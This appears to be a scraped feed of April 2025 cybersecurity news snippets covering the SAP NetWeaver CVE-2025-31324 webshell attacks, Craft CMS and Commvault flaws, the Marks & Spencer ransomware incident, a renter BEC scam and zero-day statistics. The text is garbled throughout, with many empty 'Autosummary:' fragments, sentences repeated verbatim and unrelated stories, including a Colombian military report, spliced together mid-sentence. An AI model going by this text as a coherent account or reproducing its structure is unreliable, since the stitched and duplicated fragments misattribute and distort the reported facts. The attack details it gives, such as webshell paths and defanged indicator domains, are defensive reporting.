“On April 22, 2025, ReliaQuest published an investigation into exploitation activity targeting SAP NetWeaver systems, uncovering a critical vulnerability later identified by SAP as “CVE-2025-31324″ with a severity score of 10.” reads the report published by ReliaQuest. The delayed follow-up after initial access suggests the attacker may be an initial access broker, likely selling access via VPN, RDP, or vulnerabilities on forums. "Emails purportedly sent by rental property management firms are being used to steal money from people in France and Canada, Proofpoint researchers have warned. A BEC scam preying on renters “Most campaigns are sent from compromised mailboxes belonging to educational institutions in various regions, and use a generic subject line, for example ‘Loyer’ and ‘Nouveau RIB’,” Proofpoint says. “The term ‘RIB’ refers to ‘Relevé d’Identité Bancaire’ (which roughly translates to ‘bank account identity statement’). Early … More
The post Property renters targeted in simple BEC scam appeared first on Help Net Security.
"Autosummary:
Early campaigns often included attached PDFs using logos and statements such as ‘Gestion locative de bien immobilier’ (‘Rental property management’), ‘Garantie des loyers’ (Rent guarantee), and ‘Gestion immobilier comptabilité’ (‘Real estate management accounting’).” "Autosummary:
Targeted attacks on Colombian security forces leave 27 dead in two weeks The bodies of six soldiers were found at the site of an ambush in Guaviare, the body of a seventh missing soldier was found later Petro was elected on a promise to bring "total peace" to Colombia, but on Friday his interior minister acknowledged that the strategy was "not going well", following the breakdown of talks with the Gulf Clan and several other armed groups. "Autosummary:
"Autosummary:
It featured extensive customization options, advanced 2FA-bypassing mechanisms, automatic SMS-based interactions with victims, and a real-time campaign management panel. "Autosummary:
"Autosummary:
And blocks connections to these associated domains: atmolatori[.]icu gomolatori[.]cyou molatoriby[.]cyou molatorier[.]cyou molatorier[.]icu molatoriist[.]cyou molatorila[.]cyou molatoriora[.]cyou molatoriora[.]icu molatoripro[.]cyou molatoripro[.]icu molatorisy[.]cyou molatorisy[.]icu onmolatori[.]icu promolatori[.]icu samolatori[.]cyou samolatori[.]icu umolatori[.]icu We don’t just report on data privacy—we help you remove your personal information Cybersecurity risks should never spread beyond a headline. What we can do When receiving unsolicited emails there are a few necessary precautions you can take to avoid falling for phishing: Verify the source of the email through independent sources. "Edgescan’s 2025 Vulnerability Statistics Report explores risk density patterns across network/device and application layers, uncovers complex vulnerabilities that automated tools consistently miss, and evaluates the real-world effectiveness of leading vulnerability scoring methodologies, including EPSS, CISA KEV, CVSS, and our proprietary EVSS system. This year’s findings reveal significant industry variances in vulnerability remediation efficiency, with software companies achieving the fastest mean time to remediate (63 days), while construction sector organizations lag considerably (104 days). Edgescan also … More
The post Download: Edgescan 2025 Vulnerability Statistics Report appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" RomCom, besides manipulating Windows Registry to set up persistence using COM hijacking, is equipped to harvest credentials, perform system reconnaissance, enumerate Active Directory, conduct lateral movement, and collect data of interest, including files, credentials, configuration details, and Microsoft Outlook backups. "Autosummary:
Since 2021, APT28 has targeted or compromised French ministerial bodies, local governments, DTIB, aerospace, research, think-tanks, and financial entities. "Autosummary:
"Autosummary:
Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Episode links: Sponsored by: Vanta – Expand the scope of your security program with market-leading compliance automation… while saving time and money. "Autosummary:
"I’ve never quite seen anything like this in my two decades of working in the Internet of Things (IoT) space. In just a few years, devices at home and work started including cameras to see and microphones to hear. Now, with new lines of vacuums and emerging humanoid robots, devices have appendages to manipulate the world around them. They’re not only able to collect information about their environment but can touch, “feel”, and move it. … More
The post Eyes, ears, and now arms: IoT is alive appeared first on Help Net Security.
"Autosummary:
Likewise, users can more safely participate in the robot revolution by segmenting their home networks, implementing multi-factor authentication, and regularly reviewing device permissions.Armed with, well, arms, this evolution interconnects cybersecurity with physical security.This means following best practice cybersecurity by enabling peer-to-peer connectivity, outlawing generic credentials, and supporting software throughout the device lifecycle. "Autosummary:
"Autosummary:
For software customers, this means your environment must be: (i) accessible via the internet, (ii) compromised through an unrelated avenue, and (iii) accessed leveraging legitimate user credentials. "Autosummary:
Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities catalog Pierluigi Paganini April 29, 2025 April 29, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Qualitia Active! "The “cyber incident” that British multinational retailer Marks & Spencer has been struggling with for over a week is a ransomware attack, multiple sources have asserted. The Telegraph’s sources say ransomware was deployed by a unnamed criminal gang. Bleeping Computer’s says the attackers were members of the Scattered Spider hacking group, and that M&S’s virtual machines on VMware ESXi hosts have been encrypted with the DragonForce encryptor. The effects of the attack The company publicly … More
The post Marks & Spencer cyber incident linked to ransomware group appeared first on Help Net Security.
"Autosummary:
The effects of the attack have been felt by customers: online orders have been (and are still) suspended, contactless payments and the redeption of gift cards were temporarily impossible, some orders went undelivered, refunds were delayed, and the customer reward scheme was paused. "Bugcrowd’s new service connects customers with a global network of vetted ethical hackers for a variety of red team engagements—fully managed through the Bugcrowd Platform. This release sets a new benchmark in the red team services market, enabling organizations to test their security environments with the highest level of confidence. By tapping into a global pool of experts using the latest adversarial tactics, techniques, and procedures (TTPs), customers gain unparalleled insight into how real-world attackers … More
The post Bugcrowd enables organizations to test their security environments appeared first on Help Net Security.
"Autosummary:
High return on investment: Take advantage of flexible pricing options, including day-rate engagements, reward pools, and continuous programs, to suit a range of needs, budgets, and objectives. Operators mimic the behaviors of nation-state actors, organized cybercriminals, and insider threats to authentically test an organization’s ability to detect, respond to, and contain advanced attacks. "Autosummary:
What"s more, the zero-day exploitation of 34 of the 75 flaws have been attributed to six broad threat activity clusters - State-sponsored espionage (10), led by China (5), Russia (1), and South Korea (1) (e.g., CVE-2023-46805, CVE-2024-21887) Commercial surveillance vendors (8) (e.g., CVE-2024-53104, CVE-2024-32896, CVE-2024-29745, CVE-2024-29748) Non-state financially motivated groups (5) (e.g., CVE-2024-55956) "Autosummary:
The review ended on August 12, 2024, revealing personal data like names, addresses, dates of birth, gender, and/or Social Security numbers were compromised. "Autosummary:
CISA has given impacted organizations until May 17, 2025, to apply fixes or available mitigations for CVE-2025-3928 and May 19, 2025, for the other two flaws. "Autosummary:
In 2024, end-user platforms and products (e.g., web browsers, mobile devices, and desktop operating systems) bore the brunt of this activity, End-user platforms and products (e.g., web browsers, mobile devices, and desktop operating systems) made up 56 percent of the tracked zero-days. "Autosummary:
Otherwise, we’ll be back here next year, reporting another surge and asking, yet again, when on earth things will begin to get better. "Bitwarden launched Access Intelligence, a set of new capabilities that enables enterprises to proactively defend against internal credential risks and external phishing threats. Access Intelligence introduces two core functionalities: Risk Insights, which allows IT teams to identify, prioritize, and remediate at-risk credentials; and Advanced Phishing Blocker, which alerts and redirects users away from known phishing sites in real-time, using a continuously updated open source blocklist of malicious domains. This approach enables better protection for users … More
The post Bitwarden Access Intelligence defends against credential risks and phishing appeared first on Help Net Security.
"Autosummary:
Empower teams to act, remediate, and prevent threats The Risk Insights for Access Intelligence dashboard delivers actionable visibility into credential-related security risks, empowering IT administrators to: Identify weak, reused, or exposed credentials stored across key business applications Prioritize remediation efforts based on application importance Automatically alert end users of compromised credentials Initiate guided remediation workflows Monitor password health improvements across the organization These workflows help close security gaps while reinforcing enterprise access policies. "The Cybersecurity and Infrastructure Security Agency (CISA) has added three new flaws to its Known Exploited Vulnerabilities catalog on Monday, affecting Commvault (CVE-2025-3928), Active! Mail (CVE-2025-42599), and Broadcom Brocade (CVE-2025-1976) solutions. CISA’s KEV catalog is constantly updated and provides IT admins in US federal civilian agencies with instructions on how to remediate these threats and by which date (as mandated by the Binding Operational Directive 22-01), but this living document can also come in handy … More
The post CISA warns about actively exploited Broadcom, Commvault vulnerabilities appeared first on Help Net Security.
"Autosummary:
“Through a flaw in IP Address validation, a local user, assigned one of the pre-defined admin roles or a user-defined role with admin-level privileges, can execute arbitrary code as if they had full root level access,” Broadcom said in an advisory published nearly two weeks ago. "Autosummary:
Google Threat Intelligence Group (GTIG) tracked 75 actively exploited zero-day flaws in 2024 Pierluigi Paganini April 29, 2025 April 29, 2025 Google tracked 75 zero-day flaws exploited in 2024, down from 98 in 2023, according to its Threat Intelligence Group’s latest analysis. "Autosummary:
" According to NATO, these recent incidents include "sabotage, acts of violence, cyber and electronic interference, disinformation campaigns, and other hybrid operations" that have impacted Czechia, Estonia, Germany, Latvia, Lithuania, Poland, as well as the United Kingdom. "Autosummary:
"In 2024, threat actors exploited 75 zero-days – i.e., vulnerabilities previously unknown to vendors, thus without a readily available patch – in a wide variety of attacks. Of these, 33 vulnerabilities (44%) affected enterprise solutions, which is up from 37% in 2023, according to Google Threat Intelligence Group researchers. “Zero-day vulnerabilities in security software and appliances were a high-value target in 2024. We identified 20 security and networking vulnerabilities, which was over 60% of all … More
The post 44% of the zero-days exploited in 2024 were in enterprise solutions appeared first on Help Net Security.
"Autosummary:
Advice for vendors The most frequent types of zero-day vulnerabilities exploited in 2024 were use-after-free, command/code injection, and cross-site scripting vulnerabilities, and these can be prevented by prioritizing higher coding standards and preventative practices such as regular code reviews, refactoring outdated codebases, and relying on up-to-date, trusted libraries, the researchers noted. "Ransomware attacks are becoming more refined and pervasive, posing significant challenges to organizations globally. A Veeam report reveals that while the percentage of companies impacted by ransomware attacks has slightly declined from 75% to 69%, the threat remains substantial. This decrease is attributed to improved preparation and resilience practices, as well as increased collaboration between IT and security teams. However, as ransomware attacks from both established groups and “lone wolf” actors proliferate, organizations must adopt … More
The post Ransomware attacks are getting smarter, harder to stop appeared first on Help Net Security.
"Autosummary:
Pre-attack confidence among ransomware victims often doesn’t reflect reality, as 69% believed they were prepared before being attacked, while their confidence plummeted by over 20% afterward, revealing significant gaps in planning. Notably, CIOs experienced a 30% decline in their preparedness rating post-attack, compared to a 15% drop for CISOs, suggesting that CISOs have a clearer grasp of their organization’s security posture. "Autosummary:
(CVSS score: 9.0) - An improper protection of alternate path flaw in the Yii PHP framework used by Craft CMS that could be exploited to access restricted functionality or resources (A regression of CVE-2024-4990) CVE-2025-32432 (CVSS score: 10.0) - A remote code execution (RCE) vulnerability in Craft CMS (Patched in versions 3.9.15, 4.14.15, and 5.6.17) According to the cybersecurity company, CVE-2025-32432 resides in a built-in image transformation feature that allows site administrators to keep images to a certain format. "CVE-2025-31324, a critical vulnerability in the SAP NetWeaver platform, is being actively exploited by attackers to upload malicious webshells to enable unauthorized file uploads and code execution. The vulnerability was initially leveraged in zero-day attacks spotted by ReliaQuest researchers, who reported them to SAP. The software company confirmed that the attackers have been leveraging a new vulnerability; released an emergency patch on April 24; and urged organizations to upgrade to implement it and check whether … More
The post Critical SAP NetWeaver flaw exploited by suspected initial access broker (CVE-2025-31324) appeared first on Help Net Security.
"Autosummary:
About the attacks ReliaQuest investegated the attacks after several of its customers were hit this month, and discovered that the attackers: Uploaded .jps webshells (e.g., helper.jsp or cache.jsp) into the j2ee/cluster/apps/sap.com/irj/servletjsp/irj/root/ directory directory Fired off a GET request to execute them Used the Brute Ratel tool and the Heaven’s Gate technique to establish command and control communication, effect post-exploitation actions, and avoid detection by endpoint security solutions. "Autosummary:
"Autosummary:
“Today, many security vendors are shifting towards building eBPF-based agents, largely because eBPF is considered “safe” for use in products like EDR and CWPP.” concludes the report. "Autosummary:
This vulnerability has been reported by Orange Cyberdefense a month ago after our CSIRT investigated a case where two 0-day vulnerabilities have been exploited 1/6https://t.co/ndHdjHFyYj — CERT Orange Cyberdefense (@CERTCyberdef) April 25, 2025 The two vulnerabilities, tracked as CVE-2025-32432 and CVE-2024-58136, are respectively a remote code execution (RCE) in Craft CMS and an input validation flaw in the Yii framework used by Craft CMS. "Peridio, a platform for building and maintaining advanced embedded products, has launched Avocado OS, an open-source embedded Linux distribution made to simplify the way developers build complex embedded systems. Avocado OS focuses on delivering a smooth developer experience while offering security, reliability, and consistent performance. A new answer to an old problem Teams building with traditional Embedded Linux often face a tough choice. They must pick between developer-friendly systems that move fast, or production systems … More
The post Avocado OS: Open-source Linux platform for embedded systems appeared first on Help Net Security.
"Autosummary:
Avocado OS delivers critical capabilities without forcing tradeoffs: immutable and deterministic runtimes, fault-tolerance, modular update mechanisms, simplified secure boot implementation, full disk encryption, and boot modes for manufacturing, recovery, and testing. "Autosummary:
This week"s list includes — CVE-2024-58136, CVE-2025-32432 (Craft CMS), CVE-2025-31324 (SAP NetWeaver), CVE-2025-27610 (Rack), CVE-2025-34028 (Commvault Command Center), CVE-2025-2567 (Lantronix Xport), CVE-2025-33028 (WinZip), CVE-2025-21204 (Microsoft Windows), CVE-2025-1021 (Synology DiskStation Manager), CVE-2025-0618 (FireEye EDR Agent), CVE-2025-1763 (GitLab), CVE-2025-32818 (SonicWall SonicOS), CVE-2025-3248 (Langflow), CVE-2025-21605 (Redis), CVE-2025-23249, CVE-2025-23250, and CVE-2025-23251 (NVIDIA NeMo Framework), CVE-2025-22228 (Spring Framework, NetApp), and CVE-2025-3935 (ScreenConnect).Power Parasites Goes After Bangladesh, Nepal, India — An active campaign is targeting individuals across Asian countries, including Bangladesh, Nepal, and India, with job and investment scams via combination of deceptive websites masquerading as energy firms and other major firms, social media groups, Youtube videos, and Telegram channels since September 2024.In recent months, a cyber espionage campaign known as Operation Cobalt Whisper has targeted multiple industries in Hong Kong and Pakistan, including defense, education, environmental engineering, electrotechnical engineering, energy, cybersecurity, aviation and healthcare, with phasing emails that serve as a conduit to deliver Cobalt Strike. — Cybersecurity researchers have outlined two scenarios where releases associated with the PC Manager tool, a software designed to help optimize and manage Windows computers, could have been hijacked by attackers via WinGet repository (ZDI-23-1527), "aka.ms" URLs, and the official "pcmanager.microsoft[.]com" subdomain of Microsoft (ZDI-23-1528), due to overly permissive Shared Access Signature (SAS) tokens.How Windows PC Manager Could Be Hijacked — Cybersecurity researchers have outlined two scenarios where releases associated with the PC Manager tool, a software designed to help optimize and manage Windows computers, could have been hijacked by attackers via WinGet repository (ZDI-23-1527), "aka.ms" URLs, and the official "pcmanager.microsoft[.]com" subdomain of Microsoft (ZDI-23-1528), due to overly permissive Shared Access Signature (SAS) tokens. — An active campaign is targeting individuals across Asian countries, including Bangladesh, Nepal, and India, with job and investment scams via combination of deceptive websites masquerading as energy firms and other major firms, social media groups, Youtube videos, and Telegram channels since September 2024. 📰 Around the Cyber World Lumma Stealer Adopts New Tricks to Evade Detection — The information stealer known as Lumma, which has been advertised as a Malware-as-a-Service (MaaS) starting at $250 a month, is being distributed extensively using various methods such as pirated media, adult content, and cracked software sites, as well as fake Telegram channels for such content to redirect users to fraudulent CAPTCHA verifications that leverage the ClickFix tactic to trick users into downloading and running the malware via PowerShell and MSHTA commands. — The information stealer known as Lumma, which has been advertised as a Malware-as-a-Service (MaaS) starting at $250 a month, is being distributed extensively using various methods such as pirated media, adult content, and cracked software sites, as well as fake Telegram channels for such content to redirect users to fraudulent CAPTCHA verifications that leverage the ClickFix tactic to trick users into downloading and running the malware via PowerShell and MSHTA commands.Also addressed by Kentico are three other vulnerabilities, WT-2025-0006 (authentication bypass), WT-2025-0007 (Post-authentication Remote Code Execution), and WT-2025-0011 (Authentication Bypass), that can achieve Remote Code Execution against fully-patched deployments.Also addressed by Kentico are three other vulnerabilities, WT-2025-0006 (authentication bypass), WT-2025-0007 (Post-authentication Remote Code Execution), and WT-2025-0011 (Authentication Bypass), that can achieve Remote Code Execution against fully-patched deployments." — Fifty-eight suspicious Google Chrome extensions have been discovered containing risky features, such as monitoring browsing behavior, accessing cookies for domains, altering search providers, and potentially executing remote scripts, according to Secure Annex researcher John Tuckner."To set the record straight, there was no funding issue, but rather a contract administration issue that was resolved prior to a contract lapse," Matt Hartman, CISA Acting Executive Assistant Director for Cybersecurity, said."To set the record straight, there was no funding issue, but rather a contract administration issue that was resolved prior to a contract lapse," Matt Hartman, CISA Acting Executive Assistant Director for Cybersecurity, said.Several Extensions Found with Risky Features — Fifty-eight suspicious Google Chrome extensions have been discovered containing risky features, such as monitoring browsing behavior, accessing cookies for domains, altering search providers, and potentially executing remote scripts, according to Secure Annex researcher John Tuckner."The dispersal of these sophisticated criminal networks within areas of weakest governance has attracted new players, benefited from and fueled corruption, and enabled the illicit industry to continue to scale and consolidate, culminating in hundreds of industrial-scale scam centres generating just under US $40 billion in annual profits," the UNODC said.Indian Banks Ordered to Migrate to ".bank[.]in" Domains by October 31 — In Febraury 2025, India"s central bank, the Reserve Bank of India (RBI), introduced an exclusive ".bank[.]in" internet domain for banks in the country to combat digital financial fraud."If an attack had been carried out, cybercriminals could have compromised software supply chains for distribution of malware, allowed them to replace software releases, and alter distributed PC Manager executables," Trend Micro said."If an attack had been carried out, cybercriminals could have compromised software supply chains for distribution of malware, allowed them to replace software releases, and alter distributed PC Manager executables," Trend Micro said.Over 50% of the compromised devices are located in Brazil, followed by Argentina, Russia, Iraq, and Mexico, per Qrator Labs.Over 50% of the compromised devices are located in Brazil, followed by Argentina, Russia, Iraq, and Mexico, per Qrator Labs.Hong Kong, Vietnam, Mexico, the Philippines, India, and China were the main international destinations for fraudulent wire transactions.Hong Kong, Vietnam, Mexico, the Philippines, India, and China were the main international destinations for fraudulent wire transactions." — The threat actors behind the Darcula phishing-as-a-service (PhaaS) platform have released new updates to their cybercrime suite with generative artificial intelligence (GenAI) capabilities to facilitate phishing form generation in various languages, form field customization, and translation of phishing forms into local languages.In this session, you"ll learn how to stop identity-based attacks before they start, using real-time verification, access checks, and advanced deepfake detection. "Autosummary:
Additionally, the compromised site generates outbound HTTP requests to attacker-controlled domains, including woocommerce-services[.]com , woocommerce-api[.]com , and woocommerce-help[.]com . "Autosummary:
"In situations like this, in-store services are typically prioritised for recovery, which can mean online operations take slightly longer to restore," said Sam Kirkman, a director at cyber-security firm NetSPI.Ms Cunnington said she received a refund and a £10 apology voucher after calling M&S to find out what happened to the flowers, but was "a bit cross" they had allowed her to place the order in the first place, given it was aware of cyber incident. "Autosummary:
The company provides data storage, infrastructure systems, cloud management, and ransomware recovery services to government entities and some of the world"s biggest brands, including BMW, Telefónica, T-Mobile, and China Telecom. "Autosummary:
"Autosummary:
Most of the vulnerable systems (149) are in the United States, followed by India (50), Australia (37), China (31), Germany (30), the Netherlands (13), Brazil (10), and France (10). "Autosummary:
" To avoid experiencing these update issues, OffSec advises users to manually download and install the new repository signing key using the following command: sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg OffSec also provides details on how to check that the checksum of the file matches and view the contents of the updated keyring. "Autosummary:
Scattered Spider, also known as 0ktapus, Starfraud, UNC3944, Scatter Swine, Octo Tempest, and Muddled Libra, is a group of threat actors that are adept at using social engineering attacks, phishing, multi-factor authentication (MFA) bombing (targeted MFA fatigue), and SIM swapping to gain initial network access on large organizations. Researchers commonly associate attacks with the Scattered Spider group based on specific indicators of compromise, including credential-stealing phishing attacks targeting SSO platforms, social engineering attacks impersonating IT help desktop, and other tactics. "Autosummary:
The Turmoil Following BreachForums Shutdown: Confusion, Risks, and a New Beginning Pierluigi Paganini April 28, 2025 April 28, 2025 BreachForums, a major data leak marketplace, shut down on April 15 after a MyBB 0-day exploit allowed law enforcement infiltration. "Autosummary:
Below is the infection chain and malware used by the group: Earth Kurma used tools like NBTSCAN, Ladon, FRPC, WMIHACKER, and ICMPinger for lateral movement, network scanning, and malware deployment.Threat actors use custom malware, rootkits, and cloud storage for espionage, credential theft, and data exfiltration, posing a high business risk with advanced evasion techniques. "Autosummary:
Since opening its bug bounty programme, Axis has uncovered – and patched - as many as 30 vulnerabilities, says Mr Bastert, including one "we deem very severe".But while there are millions of hackers registered on the key platforms, Inti De Ceukelaire, chief hacking officer at Intigriti, says the number hunting on a daily or weekly basis is "tens of thousands." "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Released: MITRE ATT&CK v17.0, now with ESXi attack TTPs MITRE has released the latest version of its ATT&CK framework, which now also includes a new section (“matrix”) to cover the tactics, techniques and procedures (TTPs) used to target VMware ESXi hypervisors. PoC exploit for critical Erlang/OTP SSH bug is public (CVE-2025-32433) There are now several public proof-of-concept (PoC) exploits for … More
The post Week in review: MITRE ATT&CK v17.0 released, PoC for Erlang/OTP SSH bug is public appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: April 25, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Bitdefender, PowerDMARC, Skyhawk Security, Stellar Cyber, Swimlane, and Veracode.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Released: MITRE ATT&CK v17.0, now with ESXi attack TTPs MITRE has released the latest version of its ATT&CK framework, which now also includes a new section (“matrix”) to cover the tactics, techniques and procedures (TTPs) used to target VMware ESXi hypervisors. "Autosummary:
"Autosummary:
"Autosummary:
"ToyMaker is a financially-motivated initial access broker (IAB) who acquires access to high-value organizations and then transfers that access to secondary threat actors who usually monetize the access via double extortion and ransomware deployment," the company said. "Autosummary:
The hospital offers a wide range of services, including cardiology, oncology, neurology, behavioral medicine, surgery, and kidney transplantation. "Autosummary:
Compromised data includes full names, contact details, ID numbers, banking information, driver’s license numbers, medical records and passport details. "Autosummary:
Under its model, affiliates get access to the infrastructure (negotiation tools, storage for stolen data, malware administration), and use the DragonForce encryptor under their own branding. "Autosummary:
"The new ETSI TS 104 223 specification for securing AI provides reliable and actionable cybersecurity guidance aimed at protecting end users. Adopting a whole-lifecycle approach, the framework outlines 13 core principles that expand into 72 detailed, trackable principles across five key phases of the AI lifecycle, all designed to enhance the overall security of AI systems. The specification details transparent, high-level principles and provisions for securing AI. It provides stakeholders in the AI supply chain—from … More
The post 13 core principles to strengthen AI cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
In October, the FBI and CISA confirmed that the Chinese state hackers had breached multiple telecom providers (including AT&T, Verizon, Lumen, Charter Communications, Consolidated Communications, and Windstream) and many other telecom companies in dozens of countries. "Autosummary:
Although no customer names, birth dates, or financial details were leaked, the information identifying SIM cards is considered highly sensitive - as it could permit a determined criminal to hijack victims" phone numbers in a "SIM Swap" attack. "Researchers have uncovered three serious vulnerabilities in Rack, a server interface used by most Ruby web app frameworks (Ruby on Rails, Sinatra, Hanami, Roda, and others). Two of the flaws – CVE-2025-25184 and CVE-2025-27111 – could allow attackers to manipulate log content and entries, while the third one – CVE-2025-27610 – is a path traversal vulnerability that may allow attackers to gain unauthorized access to sensitive information. About CVE-2025-27610 Rack provides a standardized way for … More
The post Rack Ruby vulnerability could reveal secrets to attackers (CVE-2025-27610) appeared first on Help Net Security.
"Autosummary:
Those files may include configuration files, credentials, and other confidential data, but there’s a caveat: to access the files, the attacker must be able to determine their path. "Detectify announced new Asset Classification and Scan Recommendations capabilities. This innovation directly addresses a critical challenge for security teams: knowing what else, beyond their core applications, requires in-depth testing. The new features automatically classify discovered web assets based on attacker reconnaissance techniques and deliver recommendations on where to run DAST, helping organizations bridge the gap between broad and deep vulnerability testing across their entire attack surface. Security teams know they must test their main applications, … More
The post Detectify Asset Classification and Scan Recommendations improves vulnerability testing appeared first on Help Net Security.
"Autosummary:
The new capabilities include: Asset classification: Analyzes and categorizes all web assets discovered by Detectify, focusing on the presence of specific attributes that can indicate the purpose of each app (e.g., libraries, forms, body length, certain headers). "Autosummary:
The flaw is assessed to be rooted in the "/developmentserver/metadatauploader" endpoint in the NetWeaver environment, enabling unknown threat actors to upload malicious JSP-based web shells in the "servlet_jsp/irj/root/" path for persistent remote access and deliver additional payloads. "Autosummary:
The vulnerabilities, flagged by cybersecurity vendor OPSWAT, are listed below - CVE-2025-27610 (CVSS score: 7.5) - A path traversal vulnerability that could be used to gain access to all files under the specified root: directory, assuming an attacker can determine the paths to those files (CVSS score: 7.5) - A path traversal vulnerability that could be used to gain access to all files under the specified root: directory, assuming an attacker can determine the paths to those files CVE-2025-27111 (CVSS score: 6.9) - An improper neutralization of carriage return line feeds (CRLF) sequences and improper output neutralization for logs vulnerability that could be used to manipulate log entries and distort log files (CVSS score: 6.9) - An improper neutralization of carriage return line feeds (CRLF) sequences and improper output neutralization for logs vulnerability that could be used to manipulate log entries and distort log files CVE-2025-25184 (CVSS score: 5.7) - "Autosummary:
The malware, along with a web shell, were "installed by exploiting a zero-day vulnerability at that time, CVE-2025-0282, during attacks against organizations in Japan around December 2024," JPCERT/CC researcher Yuma Masubuchi said in a report published Thursday. "Autosummary:
Interlock ransomware gang started leaking data allegedly stolen from leading kidney dialysis firm DaVita Pierluigi Paganini April 25, 2025 April 25, 2025 The Interlock ransomware gang claimed responsibility for the attack on the leading kidney dialysis company DaVita and leaked alleged stolen data. "Autosummary:
The multinational retailer operates over 1,400 stores, employs 64,000 employees globally, and sells various products, including clothing, food, and home goods. "Autosummary:
Never share passwords, PINs, or OTPs via phone, text, or email. "Autosummary:
During the breach, the threat actors may have stolen folders, files, or records containing social security numbers, driver"s license numbers, or passport numbers belonging to current and former employees, volunteers, and contractors. "Autosummary:
In the post-exploitation phase, the attackers deployed the "Brute Ratel" red team tool, the "Heaven"s Gate" security bypassing technique, and injected MSBuild-compiled code into dllhost.exe for stealth. "Autosummary:
The use of front companies for malware propagation, complemented by setting up fraudulent accounts on Facebook, LinkedIn, Pinterest, X, Medium, GitHub, and GitLab, marks a new escalation for the threat actors, who have been observed using various job boards to lure victims. "In this new campaign, the threat actor group is using three front companies in the cryptocurrency consulting industry—BlockNovas LLC (blocknovas[.] com), Angeloper Agency (angeloper[.]com), and SoftGlide LLC (softglide[.]co)—to spread malware via "job interview lures," Silent Push said in a deep-dive analysis. "Autosummary:
JPCERT warns of DslogdRAT malware deployed in Ivanti Connect Secure Pierluigi Paganini April 25, 2025 April 25, 2025 Researchers identified a new malware, named DslogdRAT, deployed after exploiting a now-patched flaw in Ivanti Connect Secure (ICS). "Autosummary:
SAP NetWeaver zero-day allegedly exploited by an initial access broker Pierluigi Paganini April 25, 2025 April 25, 2025 A zero-day in SAP NetWeaver is potentially being exploited, putting thousands of internet-facing applications at risk. “On April 22, 2025, ReliaQuest published an investigation into exploitation activity targeting SAP NetWeaver systems, uncovering a critical vulnerability later identified by SAP as “CVE-2025-31324″ with a severity score of 10.” reads the report published by ReliaQuest. "Autosummary:
As part of the investigation, they discovered that two zero-day vulnerabilities impacting Craft CMS were exploited to breach the server: CVE-2025-32432: A remote code execution (RCE) vulnerability in Craft CMS. "Binarly announced the rollout of its flagship Binarly Transparency Platform 3.0, a major update that fuses live threat‑intelligence signals with an exploitation‑aware scoring system to help enterprise teams prioritize the mitigation of vulnerabilities with the most immediate risk. The release introduces Threat Intelligence Monitoring, a service that tracks public proof‑of‑concept code, ransomware activity, and private telemetry to flag actively exploited flaws the moment they surface. These signals feed a new Exploitation Maturity Score (EMS) that … More
The post Binarly Transparency Platform 3.0 prioritizes vulnerabilities based on active exploitation appeared first on Help Net Security.
"Autosummary:
"Cyber threats targeting the energy sector come in many forms, including state-sponsored actors seeking to disrupt national infrastructure, cybercriminals motivated by profit, and insiders intentionally causing damage. The consequences of a successful attack can be severe, potentially disrupting energy supplies and causing economic and social damage, according to Darktrace’s research focused on the UK and US energy sector over a three-year period (November 2021 – Dec 2024). Email as the initial attack vector As seen … More
The post A new era of cyber threats is approaching for the energy sector appeared first on Help Net Security.
"Autosummary:
Email as the initial attack vector As seen in cases from both the US and UK, and across energy customers of all types, 55% of incidents involved email or SaaS, making it the most frequent attack vector. The consequences of a successful attack can be severe, potentially disrupting energy supplies and causing economic and social damage, according to Darktrace’s research focused on the UK and US energy sector over a three-year period (November 2021 – Dec 2024). "Artificial Intelligence for Cybersecurity is a practical guide to how AI and machine learning are changing the way we defend digital systems. The book aims to explain how AI can help solve real cybersecurity problems. It does that well, but it’s not for everyone. About the authors Bojan Kolosnjaji is a principal engineer and researcher specializing in AI-driven anomaly detection and large-scale cybersecurity analytics, with a PhD from TUM. Xiao Huang is a Stanford visiting … More
The post Review: Artificial Intelligence for Cybersecurity appeared first on Help Net Security.
"Autosummary:
At the same time, they do a good job warning readers about the risks: bias, hallucinations, bad data, and unrealistic expectations. "Autosummary:
Each time the app is launched, the trojan silently gathers and transmits data such as the user’s phone number, accounts, contact list, current date, geolocation, stored file details, and the app version to a command-and-control server. "The Edgescan 2025 Vulnerability Statistics Report offers a data-rich snapshot of the global cybersecurity landscape, drawing from thousands of assessments and penetration tests conducted in 2024. Now in its 10th year, the report analyzes full-stack security trends across industries, highlighting common vulnerabilities, patching delays, and risk hotspots. With insights into exploit availability, attack surface exposure, and remediation timelines, it equips organizations with the data they need to make smarter, risk-based decisions. The report highlights a … More
The post Exposed and unaware: The state of enterprise security in 2025 appeared first on Help Net Security.
"Autosummary:
Now in its 10th year, the report analyzes full-stack security trends across industries, highlighting common vulnerabilities, patching delays, and risk hotspots. "Autosummary:
According to the gang"s claim, they have around 1.5 terabytes of data from the healthcare company, or nearly 700,000 files of what appear to be sensitive patient records, information on user accounts, insurance, and even financial details. "Autosummary:
"Autosummary:
"Autosummary:
io_uring task submission and completion rings Source: Donald Hunter The problem, according to ARMO, arises from the fact that most security tools monitor for suspicious syscalls and hooking (like "ptrace" or "seccomp"), completely ignoring anything that involves the io_ring, creating a very dangerous blindspot. "Autosummary:
From there, they persuade the victim to remove the spending limits on their card, and then to install what they claim is a security application, sent to their phone as a link. The malware, which cybersecurity company Cleafy calls SuperCard X, uses a feature now found in most Android phones: near-field communication (NFC).The attacker, who by now will likely have built up a rapport with the victim, will ask them to tap their card to their phone. "If your organization is using Commvault Command Center for your data protection, backup creation, configuration and restoration needs, you should check whether your on-premise installation has been upgraded to patch a critical vulnerability (CVE-2025-34028) that could allow unauthenticated remote code execution. About CVE-2025-34028 CVE-2025-34028 is a path traversal vulnerability affecting Commvault Command Center (Innovation Release) versions from 11.38.0 to 11.38.19, on Windows and Linux. It was unearthed by watchTowr researcher Sonny Macdonald, who discovered an … More
The post Critical Commvault RCE vulnerability fixed, PoC available (CVE-2025-34028) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
